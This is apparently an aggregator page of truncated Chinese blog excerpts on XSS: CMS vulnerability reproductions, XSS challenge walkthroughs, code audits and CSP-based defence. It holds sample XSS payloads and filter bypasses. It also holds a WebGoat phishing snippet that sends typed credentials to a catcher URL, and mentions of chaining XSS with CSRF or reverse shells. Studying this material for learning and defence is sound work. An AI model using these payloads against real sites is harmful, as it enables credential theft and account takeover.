个人博客地址:xzajyjs.cn 作为一个开源的企业门户系统(EPS), 企业可以非常方便地搭建一个专业的企业营销网站,进行宣传,开展业务,服务客户.蝉知系统内置了文章.产品.论坛.评论.会员.博客.帮助等功能,同时还可以和微信进行集成绑定.功能丰富实用,后台操作简洁方便.蝉知系统还内置了搜索引擎优化必备的功能,比如关键词,摘要,站点地图,友好路径等,使用蝉知系统可以非常方便的搭建对搜索引擎友好的网站. 今天就对他的早期版本7.x的xss漏洞进行复现. 进到他的主页,先观察到有留言板,可以考虑…

一.背景 笔者6月份在慕课网录制视频教程XSS跨站漏洞 加强Web安全,里面需要讲到很多实战案例,在漏洞挖掘案例中分为了手工挖掘.工具挖掘.代码审计三部分内容,手工挖掘篇参考地址为快速找出网站中可能存在的XSS漏洞实践(一)https://segmentfault.com/a/1190000016095198 本文主要记录利用Web安全工具Burp suite进行XSS漏洞挖掘部分,分为了设置代理,漏洞扫描,漏洞验证三个部分,其中permeate渗透测试系统的搭建可以参考第一篇文章. 二.操作概…

i春秋作家:F0rmat 原文来自:YxCMS 1.4.7 最新版漏洞分析 0x01前言 很感谢关注我专辑的表哥,我会坚持写下去的,最近会慢一点,一月四篇是正常的. 在先知看到的,大部分都是后台漏洞,部分厂商对于后台的漏洞都不认可,因为厂商觉得能进入后台这些漏洞都不是漏洞.最恐怖的是厂商否认了漏洞存在,然后偷偷的去修复. 0x02 安装程序 具体的安装和使用的详细可以上官网查看https://www.kancloud.cn/yongheng/yxcms 0x03 前台XSS 1.漏洞复现 打开链…

markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到HackMD在前端渲染Markdown时的XSS防御所引起我的兴趣,由于HackMD允许嵌入客制化的网页标签,为了防止XSS的问题势必得对HTML进行过滤,这里HackMD使用了一个XSS防御函示库- npm/xss来防御!从相关的文档及GitHub上的Issue及星星数观察看起来是一个很成熟的XSS防御函…

0x00 源起 最近在深入学习反射XSS时遇到蝉知CMS5.6反射型XSS这个案列,乍一看网上的漏洞介绍少之又少,也没有详细的审计复现流程.虽然是17年的漏洞了,不巧本人正是一个喜欢钻研的人.这个CMS引起我极大的兴趣.在基本没有开发经验的前提下,目前只对MVC有一点很浅显的了解后我打算啃下这块硬骨头,并且这也是我第一个较完整的审计复现的一个CMS,前前后后用了接近3天的时间才差不多搞懂触发的流程,对我来说可以说是非常艰难了,幸运的是我还是啃了下来. 可能这个漏洞不新鲜,但是我想说的是发现漏洞的…

最新文章更新见个人博客 漏洞说明 根据9.20日CobaltStrike官方发布的最新4.7.1版本的更新日志中介绍,<=4.7的teamserver版本存在XSS漏洞,从而可以造成RCE远程代码执行 一位名为"Beichendream"的独立研究人员联系我们,告知我们他们在团队服务器中发现的一个 XSS 漏洞.这将允许攻击者在 Beacon 配置中设置格式错误的用户名,从而允许他们远程执行代码RCE. 复现过程 根据漏洞原理,类似之前使用的cs上线器,稍微修改一下上线的payl…

到目前为止,我们把能用前端脚本防御 XSS 的方案都列举了一遍. 尽管看起来似乎很复杂累赘,不过那些是理论探讨而已,在实际中未必要都实现.我们的目标只是为了预警,能发现问题就行,并非要做到滴水不漏的程度. 事实上,HTML5 早已制定了一套浏览器 XSS 解决方案 —— Content Security Policy,并且大多主流浏览器实现了这个标准. 既然我们使用前端脚本重新实现一遍,因此得在各个方面占有优势. 兼容性 CSP 目前主流浏览器大多已支持,IE10.11 支持部分功能.对于 IE…

关于 XSS 怎样形成.如何注入.能做什么.如何防范,前人已有无数的探讨,这里就不再累述了.本文介绍的则是另一种预防思路. 几乎每篇谈论 XSS 的文章,结尾多少都会提到如何防止,然而大多万变不离其宗.要转义什么,要过滤什么,不要忘了什么之类的.尽管都是众所周知的道理,但 XSS 漏洞十几年来几乎从未中断过,不乏一些大网站也时常爆出,小网站更是家常便饭. 预警系统 事实上,至今仍未有一劳永逸的解决方案,要避免它依旧使用最古老的土办法,逐个的过滤.然而人总有疏忽的时候,每当产品迭代更新时,难免会遗…

Web安全XSS 简单的反射型XSS钓鱼演示 </form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.v…

前言 做xss做疯了再来一个. 地址:https://xss-quiz.int21h.jp/ ,这个貌似是日本的一个安全研究员yamagata21做的. 做到第九关就跪了,而总共有二十关.一半都还没有,实在是惭愧.第九关考的是utf-7编码绕过实体编码的问题,但是我在最新的chrome和firefox都不能复现.查了好一会资料才发现,utf-7 bom xss是用来bypass ie 7的. 这.... 又因为这个挑战后面的关卡,貌似必须得过了前面的关卡才能通关.所以,只好做到这里了,先做个记录…

说到跨站资源监控,首先会联想到『Content Security Policy』.既然 CSP 好用,我们何必自己再搞一套呢.那就先来吐槽下 CSP 的缺陷. 目前的 CSP 日志不详细 用过 CSP 的都很郁闷,上报的只有违规的站点名,却没有具体路径.这是缺陷,还是特意的设计? 显然,CSP 是为安全定制的,里面的规范自然要严格制定,否则就会带来新的安全问题.如果支持详细路径的上报,那又会引出什么问题? 由于 CSP 会上报所有的请求,甚至包括重定向的,因此可以用来探测重定向后的地址.假如已登…

0x00前言 今天在知道创宇上发现3月26日提交WordPress XSS和远程代码执行漏洞,于是试着复现了下远程代码执行漏洞 该漏洞源于Social Warfare组件,并且版本<=3.5.2.且要是管理员登录状态,因此该漏洞是个后台代码执行 漏洞报告https://www.webarxsecurity.com/social-warfare-vulnerability/ 利用需一台能够被访问的vps 0x01环境搭建 我是采用的windows下的phpstudy,php版本为5.4 WordP…

CMS(内容管理系统)很适合被用来做代码审计,尤其是现在CMS系统越来越流行,很多人愿意使用CMS搭建自己的项目.由于大部分CMS是一种开源项目,所以对于CMS的审计属于白盒测试,白盒测试让我们可以发现更多的安全漏洞,而且一旦我们发现了这些漏洞,由于其被广泛使用,所以它的漏洞的影响范围也是呈指数级增长的.这是因为通过白盒测试我们可以查看到程序的内部结构,从而更清楚的理解程序的工作原理. WityCMS就是一个由creatiwiwiwiwiwity制作的CMS系统,它帮助管理不同用途的内容,如个人…

当网站cookie设置了httponly,xss获取不到到网站的cookie.但是我们是可以获取到网站后台的url. 这时候我们可以xss得到网站后台源码,从而找到网站后台的一些敏感操作:添加用户,删除用户,修改密码,数据库备份等等. 在这个xss点上,用ajax构造post数据包,添加用户.这就应该是xss+csrf的利用. 最近开发我们学校的党建系统,下面我们来复现一下上面操作: 1.前提是我们已经获得后台的地址了,这时候在xss平台上配置如下代码: function createXmlHt…

xss再分析 短payload <svg/onload=alert(1)> <body/onfocus=alert``> <body/onfocus=confirm``>//过滤alert时用 众多过狗xss payload 防御xss htmlspecialchars() 函数 把预定义的字符 "<" (小于)和 ">" (大于)转换为 HTML 实体 " onmouseover=alert(0) id=&…

Stage #16 同样为DOM 型XSS ,document.write() 方法 插入代码 \x3cscript\x3ealert(document.domain)\x3c/script\x3e   查看源代码,过滤了反斜杠,插入 \\x3cscript\\x3ealert(document.domain)\\x3c/script\\x3e   查看源代码,发现\x 转化成了\\x,尝试采用unicode 编码绕过   成功绕过,弹窗通关   Stage #17 宽字节注入,利用特殊字节吃掉…

帝国CMS(EmpireCMS) v7.5 前台XSS漏洞分析 一.漏洞描述 该漏洞是由于javascript获取url的参数,没有经过任何过滤,直接当作a标签和img标签的href属性和src属性输出. 二.漏洞复现 1.需要开启会员空间功能(默认关闭),登录后台开启会员空间功能. 2.漏洞出现的位置在/e/ViewImg/index.html,浏览代码,发现如下代码存在漏洞 分析代码:通过Request函数获取地址栏的url参数,并作为img和a标签的src属性和href属性,然后经过doc…

帝国CMS(EmpireCMS) v7.5 后台XSS漏洞分析 一.漏洞描述 该漏洞是由于代码只使用htmlspecialchars进行实体编码过滤,而且参数用的是ENT_QUOTES(编码双引号和单引号),还有addslashes函数处理,但是没有对任何恶意关键字进行过滤,从而导致攻击者使用别的关键字进行攻击. 二.漏洞复现 1.漏洞出现的页面在/e/admin/openpage/AdminPage.php,浏览漏洞页面代码,发现使用hRepPostStr函数对leftfile.title.m…

对于宝塔漏洞复现和练习 0×00  什么是宝塔面板 宝塔面板是一款使用方便,功能强大且终身免费的服务器管理软件,支持Linux 与Windows 系统.一键配置:LAMP / LNMP ,网站,数据库,FTP ,SSL,通过Web 端轻松管理服务器.推出至今备受中小站点站长喜爱,下载量过百万. 0×01  漏洞成因 在6.x Linux 版本宝塔面板当中当中,相对与5.x 版本,记录了验证码错误并存入数据库当中,存储XSS缺陷就是在此处产生. 同时利用CSRF结合宝塔的计划任务反弹shell.…

在线靶场(http://xss.fbisb.com) w 第一关 get请求,没有什么过滤,直接上<script>alert()</script> 源码: 第二关 输入参数会显示在文本框,直接看页面源码 发现对输入的参数<>进行了HTML实体化导致不能执行js,但是输入参数会显示在文本框并且没有经过处理 进行对input标签的闭合,使输入的js代码执行 源码 htmlspecialchars()函数是使用来把一些预定义的字符转换为HTML实体 被转换的预定义的字符有:…

qcms是一款比较小众的cms,最近更新应该是17年,代码框架都比较简单,但问题不少倒是... 网站介绍 QCMS是一款小型的网站管理系统.拥有多种结构类型,包括:ASP+ACCESS.ASP+SQL.PHP+MYSQL 采用国际标准编码(UTF-8)和中文标准编码(GB2312)功能齐全,包括文章管理,产品展示,销售,下载,网上社区,博客,自助表单,在线留言,网上投票,在线招聘,网上广告等多种插件功能 程序和网页代码分离 支持生成Google.Baidu的网站地图 建站 说实话,官网写的是4.…

Java审计之XSS篇 0x00 前言 继续 学习一波Java审计的XSS漏洞的产生过程和代码. 0x01 Java 中XSS漏洞代码分析 xss原理 xss产生过程: 后台未对用户输入进行检查或过滤,直接把用户输入返回至前端.导致javascript代码在客户端任意执行. XSS代码分析 在php里面会使用echo对用户输入的参数进行直接输出,导致了xss漏洞的产生.而在Java里面会将接收到的未经过滤的参数共享到request域中,在jsp的页面里面使用EL表达式进行输出. 这里编写一个se…

最近开始学习审计,拿一些简单cms的漏洞复现一下.源码在文末会分享出来. 0x01 index.php <?php if(!file_exists("data/config.inc.php")){header("location:install/index.php");exit();} require dirname(__FILE__).'/system/common.inc.php'; ?> 判断是否安装了该程序.接下来跟踪 "/system…

DOM XSS简介 DOM XSS与反射性XSS.存储型XSS的主要区别在于DOM XSS的XSS代码不需要服务端解析响应的直接参与,触发XSS的是浏览器端的DOM解析. DOM XSS复现 环境搭建 <html> <head> <title>DOM XSS</title> <meta charset="utf-8"> </head> <body> <div id="area"…

简介  原题复现:  考察知识点:SSRF.反序列化.SQL注入  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 分析了整体结构 点击jion可以添加账号还有博客地址添加OK之后会有ifram把你的博客地址引用到当前页面 jion添加的信息点击进入发现了get注入点 注入进去没flag 不过在data字段下发现了序列化的值 /view.php?no=1 and 1=1 /view.php?no=1 and…

查看关键代码: <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $str22=str_replace(">","",$str11); $str33=str_replace("<",…

发现一个总结了乌云以前代码审计案例的宝藏网站:https://php.mengsec.com/ 希望自己能成为那个认真复现和学习前辈们思路的那个人,然后准备慢慢开始审计一些新的小型cms了 骑士cms3.0储存型XSS漏洞,源代码可以在74CMS官网上找到:http://www.74cms.com/download/ 要挖掘储存型XSS需要寻找未过滤的输入点和未过滤的输出函数,这个最终的输出点可能跟输入点完全不在一个业务流上,对于这类可以根据当前代码功能去猜,或者老老实实去追哪里有操作过这个数据…

学长发的xss靶场,刚好js学完了,上手整活. 这个提示说非常简单,直接插入就完事了 <script>alert(document.domain)</script> 第二关. 这提示当时没看懂,淦,建议直接看源码,看完之后再结合提示更佳 说明要输出点,在属性中,结合提示,是将标签闭合,再添加. "><script>alert(document.domain)</script>< 输入,答案就出来来了 第三关 开始搞了半天,以为只有一个输…

前言:本漏洞由WebRay烽火台实验室发现,Xmind2020存在xss漏洞,并且可以进行任意代码执行,目前官方还未进行补丁修复,所以请目前Xmind用户警惕Xmind文件. 本博客讲复现漏洞及上线到Coblat-strike并讲述其中需要注意的袭击. 1.XSS复现: ***在语句后输入任何操作符,譬如空格.字母之类都会导致命令的执行,而不是必须输入cmmand.shift等语句. 2.XSS与Cobalt-strike联动 ***由于是技术博客,以达到目的为主,所以免杀暂时不做,相关免杀内容…

第一关 关键代码: 这一关两处的输出都没做任何防护,直接将用户的输入拼接到输出里面. payload: 第二关 使用上一关的payload显示如下 闭合一下标签就好了. 第三关 htmlspecialchars编码会将预定义的字符转换为 HTML 实体. 字符 替换后 & (& 符号) & " (双引号) ",除非设置了 ENT_NOQUOTES ' (单引号) 设置了 ENT_QUOTES 后, ' (如果是 ENT_HTML401) ,或者 &apo…